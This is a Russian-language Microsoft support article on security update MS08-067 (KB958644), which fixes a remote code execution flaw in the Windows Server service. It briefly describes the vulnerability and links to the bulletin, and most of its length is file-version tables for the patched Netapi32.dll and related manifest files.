Et netbios microsoft windows netapi stack overflow inbound ms08 067

Описанное в этой статье обновление устраняет уязвимость в службе сервера, которая делает возможным удаленное выполнение кода при получении уязвимой системой специального созданного RPC-запроса.

Поддержка системы Windows Vista с пакетом обновления 1 (SP1) прекращается 12 июля 2011 г. Чтобы по-прежнему получать обновления для системы безопасности Windows, установите пакет обновления 2 (SP2) для Windows Vista. Дополнительные сведения см. на указанном ниже веб-сайте Майкрософт. Заканчивается поддержка некоторых версий Windows.

ВВЕДЕНИЕ

В этой статье содержатся сведения о бета-версии продукта Майкрософт. Они предоставляются «как есть» и могут быть изменены без предварительного уведомления.

Бета-версия продукта официально не обслуживается по каналам технической поддержки корпорации Майкрософт. Сведения о получении поддержки для бета-версии см. в документации, входящей в комплект ее поставки, или на веб-узле, с которого она была загружена.
Корпорация Майкрософт выпустила бюллетень по безопасности MS08-067. Его полный текст размещен на указанных ниже веб-узлах корпорации Майкрософт.

  • Версия для пользователей домашних компьютеров:

    http://www.microsoft.com/rus/protect/computer/updates/bulletins/200810.mspxПропустить подробные сведения. Загрузите обновления на домашний или переносной компьютер с веб-узла Центра обновления Майкрософт:

    http://www.update.microsoft.com/microsoftupdate/v6/vistadefault.aspx?ln=ru-ru

  • Версия для ИТ-специалистов:

    http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx (эта ссылка может указывать на содержимое полностью или частично на английском языке)

Это уязвимость, связанная с удаленным выполнением кода. Воспользовавшись этой уязвимостью, злоумышленник может удаленно получить полный контроль над системой. На компьютерах под управлением Microsoft Windows 2000, Windows XP и Windows Server 2003 злоумышленник может воспользоваться этой уязвимостью через службу удаленного вызова процедур без прохождения проверки подлинности и запустить свой программный код. Если попытка воспользоваться уязвимостью не удается, это может также привести к сбою в файле Svchost.exe. Этот сбой влияет на службу сервера. Служба Сервер предоставляет совместный доступ по сети к файлам, принтерам и именованным каналам.

Причиной уязвимости является служба Сервера, которая неверно выполняет специально созданные запросы службы удаленного вызова.

Справка и поддержка по этому обновлению для системы безопасности

Сведения о файлах

Английская (США) версия данного обновления программного обеспечения устанавливает файлы с атрибутами, указанными в приведенных ниже таблицах. Дата и время для файлов указаны в формате UTC. Дата и время для файлов на локальном компьютере отображаются с учетом часового пояса и перехода на летнее время. При выполнении определенных операций с файлами даты и время могут меняться.

Для всех поддерживаемых выпусков Microsoft Windows 2000 с пакетом обновления 4 (SP4)

File name

File version

File size

Date

Time

Platform

Netapi32.dll

5.0.2195.7203

310,032

18-Oct-2008

03:11

x86


Примечания к сведениям о файлах для Windows XP и Windows Server 2003

  • Файлы, относящиеся к определенному выпуску (RTM, SPn) или направлению поддержки (QFE, GDR), указаны в столбцах «Требования к пакету обновления» и «Направление поддержки».

  • Выпуски обновлений GDR содержат только те исправления, которые выпускаются повсеместно и предназначены для устранения распространенных критических проблем. Выпуски обновлений QFE содержат дополнительные исправления.

  • Кроме файлов, указанных в приведенных ниже таблицах, данное обновление программного обеспечения содержит связанный каталог безопасности (KBномер.cat), снабженный цифровой подписью Майкрософт.


Для всех поддерживаемых 32-разрядных версий Windows XP

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.1.2600.3462

332,800

15-Oct-2008

16:57

x86

SP2

SP2GDR

Netapi32.dll

5.1.2600.3462

339,456

15-Oct-2008

16:53

x86

SP2

SP2QFE

Netapi32.dll

5.1.2600.5694

337,408

15-Oct-2008

16:34

x86

SP3

SP3GDR

Netapi32.dll

5.1.2600.5694

339,456

15-Oct-2008

16:25

x86

SP3

SP3QFE


Для всех поддерживаемых 64-разрядных версий Windows Server 2003 и Windows XP Professional

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

603,648

17-Oct-2008

11:44

x64

SP1

SP1GDR

Wnetapi32.dll

5.2.3790.3229

350,208

17-Oct-2008

11:44

x86

SP1

SP1GDRWOW

Netapi32.dll

5.2.3790.3229

606,720

17-Oct-2008

11:44

x64

SP1

SP1QFE

Wnetapi32.dll

5.2.3790.3229

352,768

17-Oct-2008

11:44

x86

SP1

SP1QFEWOW

Netapi32.dll

5.2.3790.4392

603,648

17-Oct-2008

11:53

x64

SP2

SP2GDR

Wnetapi32.dll

5.2.3790.4392

345,088

17-Oct-2008

11:53

x86

SP2

SP2GDRWOW

Netapi32.dll

5.2.3790.4392

606,720

17-Oct-2008

11:44

x64

SP2

SP2QFE

Wnetapi32.dll

5.2.3790.4392

347,648

17-Oct-2008

11:44

x86

SP2

SP2QFEWOW


Для всех поддерживаемых 32-разрядных версий Windows Server 2003

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

350,208

16-Oct-2008

20:09

x86

SP1

SP1GDR

Netapi32.dll

5.2.3790.3229

352,768

16-Oct-2008

21:47

x86

SP1

SP1QFE

Netapi32.dll

5.2.3790.4392

345,088

16-Oct-2008

22:18

x86

SP2

SP2GDR

Netapi32.dll

5.2.3790.4392

347,648

16-Oct-2008

23:37

x86

SP2

SP2QFE


Для всех поддерживаемых версий Windows Server 2003 для платформы IA-64

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

905,216

17-Oct-2008

11:45

IA-64

SP1

SP1GDR

Wnetapi32.dll

5.2.3790.3229

350,208

17-Oct-2008

11:45

x86

SP1

SP1GDRWOW

Netapi32.dll

5.2.3790.3229

910,848

17-Oct-2008

11:45

IA-64

SP1

SP1QFE

Wnetapi32.dll

5.2.3790.3229

352,768

17-Oct-2008

11:45

x86

SP1

SP1QFEWOW

Netapi32.dll

5.2.3790.4392

905,216

17-Oct-2008

11:50

IA-64

SP2

SP2GDR

Wnetapi32.dll

5.2.3790.4392

345,088

17-Oct-2008

11:50

x86

SP2

SP2GDRWOW

Netapi32.dll

5.2.3790.4392

910,848

17-Oct-2008

11:45

IA-64

SP2

SP2QFE

Wnetapi32.dll

5.2.3790.4392

347,648

17-Oct-2008

11:45

x86

SP2

SP2QFEWOW


Примечания к сведениям о файлах для систем Windows Vista, Microsoft Hyper-V Server 2008 и Windows Server 2008

  • Файлы, относящиеся к определенному продукту, выпуску (RTM, SPn) или направлению поддержки (LDR, GDR), можно определить по номерам версий, указанным в приведенной ниже таблице.

    Версия

    Продукт

    Выпуск

    Направление поддержки

    6.0.600 0. 16xxx

    Windows Vista

    RTM

    GDR

    6.0.600 0. 20xxx

    Windows Vista

    RTM

    LDR

    6.0.600 1. 18xxx

    Windows Vista и Windows Server 2008 с пакетами обновления 1

    SP1

    GDR

    6.0.600 1. 22xxx

    Windows Vista и Windows Server 2008 с пакетами обновления 1

    SP1

    LDR

  • Пакет обновления 1 (SP1) интегрирован в исходную версию Windows Server 2008. По этой причине сведения о файлах выпуска RTM относятся только к системе Windows Vista. Номера версий файлов выпуска RTM выглядят следующим образом: 6.0.0000.xxxxxx.

  • Выпуски обновлений GDR содержат только те исправления, которые выпускаются повсеместно и предназначены для устранения распространенных критических проблем. Выпуски обновлений LDR содержат дополнительные исправления.

  • Файлы с расширением MANIFEST и MUM, устанавливаемые для каждой среды, перечислены отдельно. Эти файлы, а также связанные CAT-файлы каталога безопасности критически важны для поддержания состояния обновляемого компонента. Файлы каталога безопасности (атрибуты не указаны) снабжены цифровой подписью Майкрософт.


Для всех поддерживаемых 32-разрядных версий Windows Server 2008 и Windows Vista

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6000.16764

425,472

16-Oct-2008

04:40

x86

Netapi32.dll

6.0.6000.20937

425,984

16-Oct-2008

04:22

x86

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86


Для всех поддерживаемых версий Windows Server 2008, Hyper-V Server 2008 и Windows Vista для платформы x64

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6000.16764

607,232

16-Oct-2008

04:43

x64

Netapi32.dll

6.0.6000.20937

606,720

16-Oct-2008

04:28

x64

Netapi32.dll

6.0.6001.18157

648,704

16-Oct-2008

05:49

x64

Netapi32.dll

6.0.6001.22288

648,704

16-Oct-2008

05:02

x64

Netapi32.dll

6.0.6000.16764

425,472

16-Oct-2008

04:40

x86

Netapi32.dll

6.0.6000.20937

425,984

16-Oct-2008

04:22

x86

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86


Для всех поддерживаемых версий Windows Server 2008 для платформы IA-64

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6001.18157

1,080,832

16-Oct-2008

06:21

IA-64

Netapi32.dll

6.0.6001.22288

1,080,832

16-Oct-2008

04:59

IA-64

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86

Примечания к сведениям о файлах для системы Windows 7 (предварительная бета-версия)

Файлы с расширением MANIFEST и MUM, устанавливаемые для каждой среды, перечислены отдельно. Эти файлы, а также связанные CAT-файлы каталога безопасности критически важны для поддержания состояния обновляемого компонента. Файлы каталога безопасности (атрибуты не указаны) снабжены цифровой подписью Майкрософт.

Для всех поддерживаемых 32-разрядных версий Windows 7 (предварительная бета-версия)

File name

File version

File size

Date

Time

Platform

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86


Для всех поддерживаемых 64-разрядных версий Windows 7 (предварительная бета-версия)

File name

File version

File size

Date

Time

Platform

Netutils.dll

6.1.6801.4107

29,184

20-Oct-2008

23:47

x64

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86


Для всех поддерживаемых версий Windows 7 (предварительная бета-версия) для платформы IA-64

File name

File version

File size

Date

Time

Platform

Netutils.dll

6.1.6801.4107

59,904

20-Oct-2008

23:08

IA-64

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86

Сведения о дополнительных файлах для систем Windows Server 2008, Windows Vista и Windows 7 (предварительная бета-версия)

Дополнительные файлы для всех поддерживаемых 32-разрядных версий Windows Server 2008 и Windows Vista

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,743

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,445

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,906

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,612

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,450

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,744

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

2,447

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,435

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,357

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,376

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,691

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,722

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,411

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,431

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,413

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,432

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,415

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,421

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,440

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,412

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,431

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,420

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,410

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,429

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_bf~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,414

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.0.1.0.mum

File version

Not Applicable

File size

1,433

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,493

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_36258762845e107951bd9aa6bb6e2cf2_31bf3856ad364e35_6.0.6000.20937_none_1b3e8fbe3df577d5.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_839cbb983f595ac76fde121c813c640b_31bf3856ad364e35_6.0.6000.16764_none_c31a32b5eaec82f7.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_8beec6c9c4e53ad3ad4e2eefee83c7bb_31bf3856ad364e35_6.0.6001.22288_none_24746e8695e50ab0.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_cf5fc08aa887a883eefd054adf032c14_31bf3856ad364e35_6.0.6001.18157_none_f5617edb87321701.manifest

File version

Not Applicable

File size

696

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:29

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

04:57

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable


Дополнительные файлы для всех поддерживаемых версий Windows Server 2008, Hyper-V Server 2008 и Windows Vista для платформы x64

File name

Amd64_016ff16d0fb7adfd32cc8cac619f7020_31bf3856ad364e35_6.0.6001.22288_none_63879e5572c63a8d.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_17b51416d1f0879bd01802235d17e183_31bf3856ad364e35_6.0.6001.18157_none_059d2147a43b46c0.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_4a708e10febe190d564ab30203394f1c_31bf3856ad364e35_6.0.6000.16764_none_7838dfe143478799.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_67941fc4deac88f98600b6aa3d634fa5_31bf3856ad364e35_6.0.6001.18157_none_7700084c05e335ee.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_73aa7275aac93043dad7f68b22dc689e_31bf3856ad364e35_6.0.6000.20937_none_8d173e2dc1c0db98.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_854c9ca1f90fdf0fef990f5d99c75b11_31bf3856ad364e35_6.0.6001.22288_none_48ff81aaf19bff94.manifest

File version

Not Applicable

File size

700

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_c889ea7b0835e36fc67c4ccc4ec07ed3_31bf3856ad364e35_6.0.6000.16764_none_c5bae36e7a056bed.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_f9502c7e5f482bc6c92ce8f63becff94_31bf3856ad364e35_6.0.6000.20937_none_c14b7e8f3e6dce2d.manifest

File version

Not Applicable

File size

1,040

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_e72f9b76bcf3c8a0.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:21

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_e7dcaac9d5f65dc3.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:01

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_e923aae6ba0f89a5.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

06:39

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_e98dd837d3449699.manifest

File version

Not Applicable

File size

12,067

Date (UTC)

16-Oct-2008

Time (UTC)

05:38

Platform

Not Applicable

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,753

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,459

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,126

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

3,056

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,892

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,894

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,966

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,894

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,754

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_6_for_kb958644~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

2,461

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,424

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,443

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,365

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_1~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,384

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,701

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,732

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,419

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,421

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,440

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,423

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,442

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,429

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,448

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,420

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,439

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,428

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,447

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,418

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,437

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,422

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.0.1.0.mum

File version

Not Applicable

File size

1,441

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

3,519

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.16764_none_8b10fff30496576a.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:29

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6000.20937_none_8bbe0f461d98ec8d.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

04:57

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

